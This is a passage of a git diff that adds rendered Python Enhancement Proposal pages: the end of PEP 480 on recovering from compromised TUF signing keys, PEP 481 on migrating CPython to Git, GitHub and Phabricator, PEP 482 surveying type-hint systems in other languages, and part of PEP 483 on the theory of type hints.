  3. All project targets of the claimed roles SHOULD be compared with the last +known good consistent snapshot where none of the timestamp, snapshot, +or claimed keys were known to have been compromised. Added, updated, or +deleted targets in the compromised consistent snapshot that do not match +the last known good consistent snapshot MAY be restored to their previous +versions. After ensuring the integrity of all claimed project targets, the +claimed metadata MUST be regenerated.
  4. +
  5. The claimed metadata MUST have their version numbers incremented, expiry +times suitably extended, and signatures renewed.
  6. +
+

Following these steps would preemptively protect all of these roles even though +only one of them may have been compromised.

+

If a threshold number of root keys have been compromised, then PyPI MUST take +the steps taken when the targets role has been compromised. All of the +root keys must also be replaced.

+

It is also RECOMMENDED that PyPI sufficiently document compromises with +security bulletins. These security bulletins will be most informative when +users of pip-with-TUF are unable to install or update a project because the +keys for the timestamp, snapshot, or root roles are no longer valid. +Users could then visit the PyPI web site to consult security bulletins that +would help to explain why users are no longer able to install or update, and +then take action accordingly. When a threshold number of root keys have not +been revoked due to a compromise, then new root metadata may be safely +updated because a threshold number of existing root keys will be used to sign +for the integrity of the new root metadata. TUF clients will be able to +verify the integrity of the new root metadata with a threshold number of +previously known root keys. This will be the common case. In the worst +case, where a threshold number of root keys have been revoked due to a +compromise, an end-user may choose to update new root metadata with +out-of-band mechanisms.

+
+
+
+

Appendix A: PyPI Build Farm and End-to-End Signing

+

PyPI administrators intend to support a central build farm. The PyPI build +farm will auto-generate a Wheel, for each distribution that is uploaded by +developers, on PyPI infrastructure and on supported platforms. Package +managers will likely install projects by downloading these PyPI Wheels (which +can be installed much faster than source distributions) rather than the source +distributions signed by developers. The implications of having a central build +farm with end-to-end signing SHOULD be investigated before the maximum security +model is implemented.

+

An issue with a central build farm and end-to-end signing is that developers +are unlikely to sign Wheel distributions once they have been generated on PyPI +infrastructure. However, generating wheels from source distributions that are +signed by developers can still be beneficial, provided that building Wheels is +a deterministic process. If deterministic builds are infeasible, developers +may delegate trust of these wheels to a PyPI role that signs for wheels with +an online key.

+
+
+

References

+ +
+
+

Acknowledgements

+

This material is based upon work supported by the National Science Foundation +under Grants No. CNS-1345049 and CNS-0959138. Any opinions, findings, and +conclusions or recommendations expressed in this material are those of the +author(s) and do not necessarily reflect the views of the National Science +Foundation.

+

We thank Alyssa Coghlan, Daniel Holth, Donald Stufft, Sumana +Harihareswara, and the distutils-sig community in general for helping +us to think about how to usably and efficiently integrate TUF with +PyPI.

+

Roger Dingledine, Sebastian Hahn, Nick Mathewson, Martin Peck and Justin +Samuel helped us to design TUF from its predecessor Thandy of the Tor project.

+

We appreciate the efforts of Konstantin Andrianov, Geremy Condra, Zane Fisher, +Justin Samuel, Tian Tian, Santiago Torres, John Ward, and Yuyu Zheng to develop +TUF.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0480.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0481/index.html b/pep-0481/index.html new file mode 100644 index 00000000000..d268cfc5096 --- /dev/null +++ b/pep-0481/index.html @@ -0,0 +1,456 @@ + + + + + + + + PEP 481 – Migrate CPython to Git, Github, and Phabricator | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 481 – Migrate CPython to Git, Github, and Phabricator

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Created:
+
29-Nov-2014
+
Post-History:
+
29-Nov-2014
+
+
+
+
Table of Contents +
+
+

Abstract

+
+

Note

+

This PEP has been withdrawn, if you’re looking for the PEP +documenting the move to Github, please refer to PEP 512.

+
+

This PEP proposes migrating the repository hosting of CPython and the +supporting repositories to Git and Github. It also proposes adding Phabricator +as an alternative to Github Pull Requests to handle reviewing changes. This +particular PEP is offered as an alternative to PEP 474 and PEP 462 which aims +to achieve the same overall benefits but restricts itself to tools that support +Mercurial and are completely Open Source.

+
+
+

Rationale

+

CPython is an open source project which relies on a number of volunteers +donating their time. As an open source project it relies on attracting new +volunteers as well as retaining existing ones in order to continue to have +a healthy amount of manpower available. In addition to increasing the amount of +manpower that is available to the project, it also needs to allow for effective +use of what manpower is available.

+

The current toolchain of the CPython project is a custom and unique combination +of tools which mandates a workflow that is similar to one found in a lot of +older projects, but which is becoming less and less popular as time goes on.

+

The one-off nature of the CPython toolchain and workflow means that any new +contributor is going to need spend time learning the tools and workflow before +they can start contributing to CPython. Once a new contributor goes through +the process of learning the CPython workflow they also are unlikely to be able +to take that knowledge and apply it to future projects they wish to contribute +to. This acts as a barrier to contribution which will scare off potential new +contributors.

+

In addition the tooling that CPython uses is under-maintained, antiquated, +and it lacks important features that enable committers to more effectively use +their time when reviewing and approving changes. The fact that it is +under-maintained means that bugs are likely to last for longer, if they ever +get fixed, as well as it’s more likely to go down for extended periods of time. +The fact that it is antiquated means that it doesn’t effectively harness the +capabilities of the modern web platform. Finally the fact that it lacks several +important features such as a lack of pre-testing commits and the lack of an +automatic merge tool means that committers have to do needless busy work to +commit even the simplest of changes.

+
+

Version Control System

+

The first decision that needs to be made is the VCS of the primary server side +repository. Currently the CPython repository, as well as a number of supporting +repositories, uses Mercurial. When evaluating the VCS we must consider the +capabilities of the VCS itself as well as the network effect and mindshare of +the community around that VCS.

+

There are really only two real options for this, Mercurial and Git. Between the +two of them the technical capabilities are largely equivalent. For this reason +this PEP will largely ignore the technical arguments about the VCS system and +will instead focus on the social aspects.

+

It is not possible to get exact numbers for the number of projects or people +which are using a particular VCS, however we can infer this by looking at +several sources of information for what VCS projects are using.

+

The Open Hub (previously Ohloh) statistics [1] show that 37% of +the repositories indexed by The Open Hub are using Git (second only to SVN +which has 48%) while Mercurial has just 2% (beating only bazaar which has 1%). +This has Git being just over 18 times as popular as Mercurial on The Open Hub.

+

Another source of information on the popular of the difference VCSs is PyPI +itself. This source is more targeted at the Python community itself since it +represents projects developed for Python. Unfortunately PyPI does not have a +standard location for representing this information, so this requires manual +processing. If we limit our search to the top 100 projects on PyPI (ordered +by download counts) we can see that 62% of them use Git while 22% of them use +Mercurial while 13% use something else. This has Git being just under 3 times +as popular as Mercurial for the top 100 projects on PyPI.

+

Obviously from these numbers Git is by far the more popular DVCS for open +source projects and choosing the more popular VCS has a number of positive +benefits.

+

For new contributors it increases the likelihood that they will have already +learned the basics of Git as part of working with another project or if they +are just now learning Git, that they’ll be able to take that knowledge and +apply it to other projects. Additionally a larger community means more people +writing how to guides, answering questions, and writing articles about Git +which makes it easier for a new user to find answers and information about +the tool they are trying to learn.

+

Another benefit is that by nature of having a larger community, there will be +more tooling written around it. This increases options for everything from +GUI clients, helper scripts, repository hosting, etc.

+
+
+

Repository Hosting

+

This PEP proposes allowing GitHub Pull Requests to be submitted, however GitHub +does not have a way to submit Pull Requests against a repository that is not +hosted on GitHub. This PEP also proposes that in addition to GitHub Pull +Requests Phabricator’s Differential app can also be used to submit proposed +changes and Phabricator does allow submitting changes against a repository +that is not hosted on Phabricator.

+

For this reason this PEP proposes using GitHub as the canonical location of +the repository with a read-only mirror located in Phabricator. If at some point +in the future GitHub is no longer desired, then repository hosting can easily +be moved to solely in Phabricator and the ability to accept GitHub Pull +Requests dropped.

+

In addition to hosting the repositories on Github, a read only copy of all +repositories will also be mirrored onto the PSF Infrastructure.

+
+
+

Code Review

+

Currently CPython uses a custom fork of Rietveld which has been modified to +not run on Google App Engine which is really only able to be maintained +currently by one person. In addition it is missing out on features that are +present in many modern code review tools.

+

This PEP proposes allowing both Github Pull Requests and Phabricator changes +to propose changes and review code. It suggests both so that contributors can +select which tool best enables them to submit changes, and reviewers can focus +on reviewing changes in the tooling they like best.

+
+

GitHub Pull Requests

+

GitHub is a very popular code hosting site and is increasingly becoming the +primary place people look to contribute to a project. Enabling users to +contribute through GitHub is enabling contributors to contribute using tooling +that they are likely already familiar with and if they are not they are likely +to be able to apply to another project.

+

GitHub Pull Requests have a fairly major advantage over the older “submit a +patch to a bug tracker” model. It allows developers to work completely within +their VCS using standard VCS tooling so it does not require creating a patch +file and figuring out what the right location is to upload it to. This lowers +the barrier for sending a change to be reviewed.

+

On the reviewing side, GitHub Pull Requests are far easier to review, they have +nice syntax highlighted diffs which can operate in either unified or side by +side views. They allow expanding the context on a diff up to and including the +entire file. Finally they allow commenting inline and on the pull request as +a whole and they present that in a nice unified way which will also hide +comments which no longer apply. Github also provides a “rendered diff” view +which enables easily viewing a diff of rendered markup (such as rst) instead +of needing to review the diff of the raw markup.

+

The Pull Request work flow also makes it trivial to enable the ability to +pre-test a change before actually merging it. Any particular pull request can +have any number of different types of “commit statuses” applied to it, marking +the commit (and thus the pull request) as either in a pending, successful, +errored, or failure state. This makes it easy to see inline if the pull request +is passing all of the tests, if the contributor has signed a CLA, etc.

+

Actually merging a Github Pull Request is quite simple, a core reviewer simply +needs to press the “Merge” button once the status of all the checks on the +Pull Request are green for successful.

+

GitHub also has a good workflow for submitting pull requests to a project +completely through their web interface. This would enable the Python +documentation to have “Edit on GitHub” buttons on every page and people who +discover things like typos, inaccuracies, or just want to make improvements to +the docs they are currently writing can simply hit that button and get an in +browser editor that will let them make changes and submit a pull request all +from the comfort of their browser.

+
+
+

Phabricator

+

In addition to GitHub Pull Requests this PEP also proposes setting up a +Phabricator instance and pointing it at the GitHub hosted repositories. This +will allow utilizing the Phabricator review applications of Differential and +Audit.

+

Differential functions similarly to GitHub pull requests except that they +require installing the arc command line tool to upload patches to +Phabricator.

+

Whether to enable Phabricator for any particular repository can be chosen on +a case-by-case basis, this PEP only proposes that it must be enabled for the +CPython repository, however for smaller repositories such as the PEP repository +it may not be worth the effort.

+
+
+
+
+

Criticism

+
+

X is not written in Python

+

One feature that the current tooling (Mercurial, Rietveld) has is that the +primary language for all of the pieces are written in Python. It is this PEPs +belief that we should focus on the best tools for the job and not the best +tools that happen to be written in Python. Volunteer time is a precious +resource to any open source project and we can best respect and utilize that +time by focusing on the benefits and downsides of the tools themselves rather +than what language their authors happened to write them in.

+

One concern is the ability to modify tools to work for us, however one of +the Goals here is to not modify software to work for us and instead adapt +ourselves to a more standard workflow. This standardization pays off in the +ability to re-use tools out of the box freeing up developer time to actually +work on Python itself as well as enabling knowledge sharing between projects.

+

However, if we do need to modify the tooling, Git itself is largely written in +C the same as CPython itself is. It can also have commands written for it using +any language, including Python. Phabricator is written in PHP which is a fairly +common language in the web world and fairly easy to pick up. GitHub itself is +largely written in Ruby but given that it’s not Open Source there is no ability +to modify it so it’s implementation language is completely meaningless.

+
+
+

GitHub is not Free/Open Source

+

GitHub is a big part of this proposal and someone who tends more to ideology +rather than practicality may be opposed to this PEP on that grounds alone. It +is this PEPs belief that while using entirely Free/Open Source software is an +attractive idea and a noble goal, that valuing the time of the contributors by +giving them good tooling that is well maintained and that they either already +know or if they learn it they can apply to other projects is a more important +concern than treating whether something is Free/Open Source is a hard +requirement.

+

However, history has shown us that sometimes benevolent proprietary companies +can stop being benevolent. This is hedged against in a few ways:

+
    +
  • We are not utilizing the GitHub Issue Tracker, both because it is not +powerful enough for CPython but also because for the primary CPython +repository the ability to take our issues and put them somewhere else if we +ever need to leave GitHub relies on GitHub continuing to allow API access.
  • +
  • We are utilizing the GitHub Pull Request workflow, however all of those +changes live inside of Git. So a mirror of the GitHub repositories can easily +contain all of those Pull Requests. We would potentially lose any comments if +GitHub suddenly turned “evil”, but the changes themselves would still exist.
  • +
  • We are utilizing the GitHub repository hosting feature, however since this is +just git moving away from GitHub is as simple as pushing the repository to +a different location. Data portability for the repository itself is extremely +high.
  • +
  • We are also utilizing Phabricator to provide an alternative for people who +do not wish to use GitHub. This also acts as a fallback option which will +already be in place if we ever need to stop using GitHub.
  • +
+

Relying on GitHub comes with a number of benefits beyond just the benefits of +the platform itself. Since it is a commercially backed venture it has a full-time +staff responsible for maintaining its services. This includes making sure +they stay up, making sure they stay patched for various security +vulnerabilities, and further improving the software and infrastructure as time +goes on.

+
+
+

Mercurial is better than Git

+

Whether Mercurial or Git is better on a technical level is a highly subjective +opinion. This PEP does not state whether the mechanics of Git or Mercurial is +better and instead focuses on the network effect that is available for either +option. Since this PEP proposes switching to Git this leaves the people who +prefer Mercurial out, however those users can easily continue to work with +Mercurial by using the hg-git [2] extension for Mercurial which will +let it work with a repository which is Git on the serverside.

+
+
+

CPython Workflow is too Complicated

+

One sentiment that came out of previous discussions was that the multi branch +model of CPython was too complicated for Github Pull Requests. It is the belief +of this PEP that statement is not accurate.

+

Currently any particular change requires manually creating a patch for 2.7 and +3.x which won’t change at all in this regards.

+

If someone submits a fix for the current stable branch (currently 3.4) the +GitHub Pull Request workflow can be used to create, in the browser, a Pull +Request to merge the current stable branch into the master branch (assuming +there is no merge conflicts). If there is a merge conflict that would need to +be handled locally. This provides an improvement over the current situation +where the merge must always happen locally.

+

Finally if someone submits a fix for the current development branch currently +then this has to be manually applied to the stable branch if it desired to +include it there as well. This must also happen locally as well in the new +workflow, however for minor changes it could easily be accomplished in the +GitHub web editor.

+

Looking at this, I do not believe that any system can hide the complexities +involved in maintaining several long running branches. The only thing that the +tooling can do is make it as easy as possible to submit changes.

+
+
+
+

Example: Scientific Python

+

One of the key ideas behind the move to both git and Github is that a feature +of a DVCS, the repository hosting, and the workflow used is the social network +and size of the community using said tools. We can see this is true by looking +at an example from a sub-community of the Python community: The Scientific +Python community. They have already migrated most of the key pieces of the +SciPy stack onto Github using the Pull Request-based workflow. This process +started with IPython, and as more projects moved over it became a natural +default for new projects in the community.

+

They claim to have seen a great benefit from this move, in that it enables +casual contributors to easily move between different projects within their +sub-community without having to learn a special, bespoke workflow and a +different toolchain for each project. They’ve found that when people can use +their limited time on actually contributing instead of learning the different +tools and workflows, not only do they contribute more to one project, but +that they also expand out and contribute to other projects. This move has also +been attributed to the increased tendency for members of that community to go +so far as publishing their research and educational materials on Github as +well.

+

This example showcases the real power behind moving to a highly popular +toolchain and workflow, as each variance introduces yet another hurdle for new +and casual contributors to get past and it makes the time spent learning that +workflow less reusable with other projects.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0481.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0482/index.html b/pep-0482/index.html new file mode 100644 index 00000000000..c2469ca2f93 --- /dev/null +++ b/pep-0482/index.html @@ -0,0 +1,325 @@ + + + + + + + + PEP 482 – Literature Overview for Type Hints | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 482 – Literature Overview for Type Hints

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Python-Ideas list
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Typing
+
Created:
+
08-Jan-2015
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP is one of three related to type hinting. This PEP gives a +literature overview of related work. The main spec is PEP 484.

+
+
+

Existing Approaches for Python

+
+

mypy

+

(This section is a stub, since mypy is essentially what we’re +proposing.)

+
+
+

Reticulated Python

+

Reticulated Python by Michael Vitousek is an example of +a slightly different approach to gradual typing for Python. It is +described in an actual academic paper written by +Vitousek with Jeremy Siek and Jim Baker (the latter of Jython fame).

+
+
+

PyCharm

+

PyCharm by JetBrains has been providing a way to specify and check +types for about four years. The type system suggested by PyCharm +grew from simple class types to tuple types, generic types, +function types, etc. based on feedback of many users who shared their +experience of using type hints in their code.

+
+
+

Others

+

TBD: Add sections on pyflakes, pylint, numpy, +Argument Clinic, pytypedecl, numba, obiwan.

+
+
+
+

Existing Approaches in Other Languages

+
+

ActionScript

+

ActionScript is a class-based, single inheritance, +object-oriented superset of ECMAScript. It supports interfaces and +strong runtime-checked static typing. Compilation supports a “strict +dialect” where type mismatches are reported at compile-time.

+

Example code with types:

+
package {
+  import flash.events.Event;
+
+  public class BounceEvent extends Event {
+    public static const BOUNCE:String = "bounce";
+    private var _side:String = "none";
+
+    public function get side():String {
+      return _side;
+    }
+
+    public function BounceEvent(type:String, side:String){
+      super(type, true);
+      _side = side;
+    }
+
+    public override function clone():Event {
+      return new BounceEvent(type, _side);
+    }
+  }
+}
+
+
+
+
+

Dart

+

Dart is a class-based, single inheritance, object-oriented +language with C-style syntax. It supports interfaces, abstract classes, +reified generics, and optional typing.

+

Types are inferred when possible. The runtime differentiates between two +modes of execution: checked mode aimed for development (catching type +errors at runtime) and production mode recommended for speed execution +(ignoring types and asserts).

+

Example code with types:

+
class Point {
+    final num x, y;
+
+    Point(this.x, this.y);
+
+    num distanceTo(Point other) {
+        var dx = x - other.x;
+        var dy = y - other.y;
+        return math.sqrt(dx * dx + dy * dy);
+    }
+}
+
+
+
+
+

Hack

+

Hack is a programming language that interoperates seamlessly +with PHP. It provides opt-in static type checking, type aliasing, +generics, nullable types, and lambdas.

+

Example code with types:

+
<?hh
+class MyClass {
+  private ?string $x = null;
+
+  public function alpha(): int {
+    return 1;
+  }
+
+  public function beta(): string {
+    return 'hi test';
+  }
+}
+
+function f(MyClass $my_inst): string {
+  // Will generate a hh_client error
+  return $my_inst->alpha();
+}
+
+
+
+
+

TypeScript

+

TypeScript is a typed superset of JavaScript that adds +interfaces, classes, mixins and modules to the language.

+

Type checks are duck typed. Multiple valid function signatures are +specified by supplying overloaded function declarations. Functions and +classes can use generics as type parameterization. Interfaces can have +optional fields. Interfaces can specify array and dictionary types. +Classes can have constructors that implicitly add arguments as fields. +Classes can have static fields. Classes can have private fields. +Classes can have getters/setters for fields (like property). Types are +inferred.

+

Example code with types:

+
interface Drivable {
+    start(): void;
+    drive(distance: number): boolean;
+    getPosition(): number;
+}
+
+class Car implements Drivable {
+    private _isRunning: boolean;
+    private _distanceFromStart: number;
+
+    constructor() {
+        this._isRunning = false;
+        this._distanceFromStart = 0;
+    }
+
+    public start() {
+        this._isRunning = true;
+    }
+
+    public drive(distance: number): boolean {
+        if (this._isRunning) {
+            this._distanceFromStart += distance;
+            return true;
+        }
+        return false;
+    }
+
+    public getPosition(): number {
+        return this._distanceFromStart;
+    }
+}
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0482.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0483/index.html b/pep-0483/index.html new file mode 100644 index 00000000000..15bcb03b3d0 --- /dev/null +++ b/pep-0483/index.html @@ -0,0 +1,911 @@ + + + + + + + + PEP 483 – The Theory of Type Hints | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 483 – The Theory of Type Hints

+
+
Author:
+
Guido van Rossum <guido at python.org>, Ivan Levkivskyi <levkivskyi at gmail.com>
+
Discussions-To:
+
Python-Ideas list
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Typing
+
Created:
+
19-Dec-2014
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP lays out the theory referenced by PEP 484.

+
+
+

Introduction

+

This document lays out the theory of the new type hinting proposal for +Python 3.5. It’s not quite a full proposal or specification because +there are many details that need to be worked out, but it lays out the +theory without which it is hard to discuss more detailed specifications. +We start by recalling basic concepts of type theory; then we explain +gradual typing; then we state some general rules and +define the new special types (such as Union) that can be used +in annotations; and finally we define the approach to generic types +and pragmatic aspects of type hinting.

+
+

Notational conventions

+
    +
  • t1, t2, etc. and u1, u2, etc. are types. Sometimes we write +ti or tj to refer to “any of t1, t2, etc.”
  • +
  • T, U etc. are type variables (defined with TypeVar(), see below).
  • +
  • Objects, classes defined with a class statement, and instances are +denoted using standard PEP 8 conventions.
  • +
  • the symbol == applied to types in the context of this PEP means that +two expressions represent the same type.
  • +
  • Note that PEP 484 makes a distinction between types and classes +(a type is a concept for the type checker, +while a class is a runtime concept). In this PEP we clarify +this distinction but avoid unnecessary strictness to allow more +flexibility in the implementation of type checkers.
  • +
+
+
+
+

Background

+

There are many definitions of the concept of type in the literature. +Here we assume that type is a set of values and a set of functions that +one can apply to these values.

+

There are several ways to define a particular type:

+
    +
  • By explicitly listing all values. E.g., True and False +form the type bool.
  • +
  • By specifying functions which can be used with variables of +a type. E.g. all objects that have a __len__ method form +the type Sized. Both [1, 2, 3] and 'abc' belong to +this type, since one can call len on them:
    len([1, 2, 3])  # OK
    +len('abc')      # also OK
    +len(42)         # not a member of Sized
    +
    +
    +
  • +
  • By a simple class definition, for example if one defines a class:
    class UserID(int):
    +    pass
    +
    +
    +

    then all instances of this class also form a type.

    +
  • +
  • There are also more complex types. E.g., one can define the type +FancyList as all lists containing only instances of int, str +or their subclasses. The value [1, 'abc', UserID(42)] has this type.
  • +
+

It is important for the user to be able to define types in a form +that can be understood by type checkers. +The goal of this PEP is to propose such a systematic way of defining types +for type annotations of variables and functions using PEP 3107 syntax. +These annotations can be used to avoid many kind of bugs, for documentation +purposes, or maybe even to increase speed of program execution. +Here we only focus on avoiding bugs by using a static type checker.

+
+

Subtype relationships

+

A crucial notion for static type checker is the subtype relationship. +It arises from the question: If first_var has type first_type, and +second_var has type second_type, is it safe to assign +first_var = second_var?

+

A strong criterion for when it should be safe is:

+
    +
  • every value from second_type is also in the set of values +of first_type; and
  • +
  • every function from first_type is also in the set of functions +of second_type.
  • +
+

The relation defined thus is called a subtype relation.

+

By this definition:

+
    +
  • Every type is a subtype of itself.
  • +
  • The set of values becomes smaller in the process of subtyping, +while the set of functions becomes larger.
  • +
+

An intuitive example: Every Dog is an Animal, also Dog +has more functions, for example it can bark, therefore Dog +is a subtype of Animal. Conversely, Animal is not a subtype of Dog.

+

A more formal example: Integers are subtype of real numbers. +Indeed, every integer is of course also a real number, and integers +support more operations, such as, e.g., bitwise shifts << and >>:

+
lucky_number = 3.14    # type: float
+lucky_number = 42      # Safe
+lucky_number * 2       # This works
+lucky_number << 5      # Fails
+
+unlucky_number = 13    # type: int
+unlucky_number << 5    # This works
+unlucky_number = 2.72  # Unsafe
+
+
+

Let us also consider a tricky example: If List[int] denotes the type +formed by all lists containing only integer numbers, +then it is not a subtype of List[float], formed by all lists that contain +only real numbers. The first condition of subtyping holds, +but appending a real number only works with List[float] so that +the second condition fails:

+
def append_pi(lst: List[float]) -> None:
+    lst += [3.14]
+
+my_list = [1, 3, 5]  # type: List[int]
+
+append_pi(my_list)   # Naively, this should be safe...
+
+my_list[-1] << 5     # ... but this fails
+
+
+

There are two widespread approaches to declare subtype information +to type checker.

+

In nominal subtyping, the type tree is based on the class tree, +i.e., UserID is considered a subtype of int. +This approach should be used under control of the type checker, +because in Python one can override attributes in an incompatible way:

+
class Base:
+    answer = '42' # type: str
+
+class Derived(Base):
+    answer = 5 # should be marked as error by type checker
+
+
+

In structural subtyping the subtype relation is deduced from the +declared methods, i.e., UserID and int would be considered the same type. +While this may occasionally cause confusion, +structural subtyping is considered more flexible. +We strive to provide support for both approaches, so that +structural information can be used in addition to nominal subtyping.

+
+
+
+

Summary of gradual typing

+

Gradual typing allows one to annotate only part of a program, +thus leverage desirable aspects of both dynamic and static typing.

+

We define a new relationship, is-consistent-with, which is similar to +is-subtype-of, except it is not transitive when the new type Any is +involved. (Neither relationship is symmetric.) Assigning a_value +to a_variable is OK if the type of a_value is consistent with +the type of a_variable. (Compare this to “… if the type of a_value +is a subtype of the type of a_variable”, which states one of the +fundamentals of OO programming.) The is-consistent-with relationship is +defined by three rules:

+
    +
  • A type t1 is consistent with a type t2 if t1 is a +subtype of t2. (But not the other way around.)
  • +
  • Any is consistent with every type. (But Any is not a subtype +of every type.)
  • +
  • Every type is consistent with Any. (But every type is not a subtype +of Any.)
  • +
+

That’s all! See Jeremy Siek’s blog post What is Gradual +Typing +for a longer explanation and motivation. Any can be considered a type +that has all values and all methods. Combined with the definition of +subtyping above, this places Any partially at the top (it has all values) +and bottom (it has all methods) of the type hierarchy. Contrast this to +object – it is not consistent with +most types (e.g. you can’t use an object() instance where an +int is expected). IOW both Any and object mean +“any type is allowed” when used to annotate an argument, but only Any +can be passed no matter what type is expected (in essence, Any +declares a fallback to dynamic typing and shuts up complaints +from the static checker).

+

Here’s an example showing how these rules work out in practice:

+

Say we have an Employee class, and a subclass Manager:

+
class Employee: ...
+class Manager(Employee): ...
+
+
+

Let’s say variable worker is declared with type Employee:

+
worker = Employee()  # type: Employee
+
+
+

Now it’s okay to assign a Manager instance to worker (rule 1):

+
worker = Manager()
+
+
+

It’s not okay to assign an Employee instance to a variable declared with +type Manager:

+
boss = Manager()  # type: Manager
+boss = Employee()  # Fails static check
+
+
+

However, suppose we have a variable whose type is Any:

+
something = some_func()  # type: Any
+
+
+

Now it’s okay to assign something to worker (rule 2):

+
worker = something  # OK
+
+
+

Of course it’s also okay to assign worker to something (rule 3), +but we didn’t need the concept of consistency for that:

+
something = worker  # OK
+
+
+
+

Types vs. Classes

+

In Python, classes are object factories defined by the class statement, +and returned by the type(obj) built-in function. Class is a dynamic, +runtime concept.

+

Type concept is described above, types appear in variable +and function type annotations, can be constructed +from building blocks described below, and are used by static type checkers.

+

Every class is a type as discussed above. +But it is tricky and error prone to implement a class that exactly represents +semantics of a given type, and it is not a goal of PEP 484. +The static types described in PEP 484 should not be confused with +the runtime classes. Examples:

+
    +
  • int is a class and a type.
  • +
  • UserID is a class and a type.
  • +
  • Union[str, int] is a type but not a proper class:
    class MyUnion(Union[str, int]): ...  # raises TypeError
    +
    +Union[str, int]()  # raises TypeError
    +
    +
    +
  • +
+

Typing interface is implemented with classes, i.e., at runtime it is possible +to evaluate, e.g., Generic[T].__bases__. But to emphasize the distinction +between classes and types the following general rules apply:

+
    +
  • No types defined below (i.e. Any, Union, etc.) can be instantiated, +an attempt to do so will raise TypeError. +(But non-abstract subclasses of Generic can be.)
  • +
  • No types defined below can be subclassed, except for Generic and +classes derived from it.
  • +
  • All of these will raise TypeError if they appear +in isinstance or issubclass (except for unparameterized generics).
  • +
+
+
+

Fundamental building blocks

+
    +
  • Any. Every type is consistent with Any; and +it is also consistent with every type (see above).
  • +
  • Union[t1, t2, …]. Types that are subtype of at least one of +t1 etc. are subtypes of this.
      +
    • Unions whose components are all subtypes of t1 etc. are subtypes +of this. +Example: Union[int, str] is a subtype of Union[int, float, str].
    • +
    • The order of the arguments doesn’t matter. +Example: Union[int, str] == Union[str, int].
    • +
    • If ti is itself a Union the result is flattened. +Example: Union[int, Union[float, str]] == Union[int, float, str].
    • +
    • If ti and tj have a subtype relationship, +the less specific type survives. +Example: Union[Employee, Manager] == Union[Employee].
    • +
    • Union[t1] returns just t1. Union[] is illegal, +so is Union[()]
    • +
    • Corollary: Union[..., object, ...] returns object.
    • +
    +
  • +
  • Optional[t1]. Alias for Union[t1, None], i.e. Union[t1, +type(None)].
  • +
  • Tuple[t1, t2, …, tn]. A tuple whose items are instances of t1, +etc. Example: Tuple[int, float] means a tuple of two items, the +first is an int, the second is a float; e.g., (42, 3.14).
      +
    • Tuple[u1, u2, ..., um] is a subtype of Tuple[t1, t2, ..., tn] +if they have the same length n==m and each ui +is a subtype of ti.
    • +
    • To spell the type of the empty tuple, use Tuple[()].
    • +
    • A variadic homogeneous tuple type can be written Tuple[t1, ...]. +(That’s three dots, a literal ellipsis; +and yes, that’s a valid token in Python’s syntax.)
    • +
    +
  • +
  • Callable[[t1, t2, …, tn], tr]. A function with positional +argument types t1 etc., and return type tr. The argument list may be +empty n==0. There is no way to indicate optional or keyword +arguments, nor varargs, but you can say the argument list is entirely +unchecked by writing Callable[..., tr] (again, a literal ellipsis).
  • +
+

We might add:

+
    +
  • Intersection[t1, t2, …]. Types that are subtype of each of +t1, etc are subtypes of this. (Compare to Union, which has at +least one instead of each in its definition.)
      +
    • The order of the arguments doesn’t matter. Nested intersections +are flattened, e.g. Intersection[int, Intersection[float, str]] +== Intersection[int, float, str].
    • +
    • An intersection of fewer types is a supertype of an intersection of +more types, e.g. Intersection[int, str] is a supertype +of Intersection[int, float, str].
    • +
    • An intersection of one argument is just that argument, +e.g. Intersection[int] is int.
    • +
    • When argument have a subtype relationship, the more specific type +survives, e.g. Intersection[str, Employee, Manager] is +Intersection[str, Manager].
    • +
    • Intersection[] is illegal, so is Intersection[()].
    • +
    • Corollary: Any disappears from the argument list, e.g. +Intersection[int, str, Any] == Intersection[int, str]. +Intersection[Any, object] is object.
    • +
    • The interaction between Intersection and Union is complex but +should be no surprise if you understand the interaction between +intersections and unions of regular sets (note that sets of types can be +infinite in size, since there is no limit on the number +of new subclasses).
    • +
    +
  • +
+
+
+
+

Generic types

+

The fundamental building blocks defined above allow to construct new types +in a generic manner. For example, Tuple can take a concrete type float +and make a concrete type Vector = Tuple[float, ...], or it can take +another type UserID and make another concrete type +Registry = Tuple[UserID, ...]. Such semantics is known as generic type +constructor, it is similar to semantics of functions, but a function takes +a value and returns a value, while generic type constructor takes a type and +“returns” a type.

+

It is common when a particular class or a function behaves in such a type +generic manner. Consider two examples:

+
    +
  • Container classes, such as list or dict, typically contain only +values of a particular type. Therefore, a user might want to type annotate +them as such:
    users = [] # type: List[UserID]
    +users.append(UserID(42)) # OK
    +users.append('Some guy') # Should be rejected by the type checker
    +
    +examples = {} # type: Dict[str, Any]
    +examples['first example'] = object() # OK
    +examples[2] = None                   # rejected by the type checker
    +
    +
    +
  • +
  • The following function can take two arguments of type int and return +an int, or take two arguments of type float and return +a float, etc.:
    def add(x, y):
    +    return x + y
    +
    +add(1, 2) == 3
    +add('1', '2') == '12'
    +add(2.7, 3.5) == 6.2
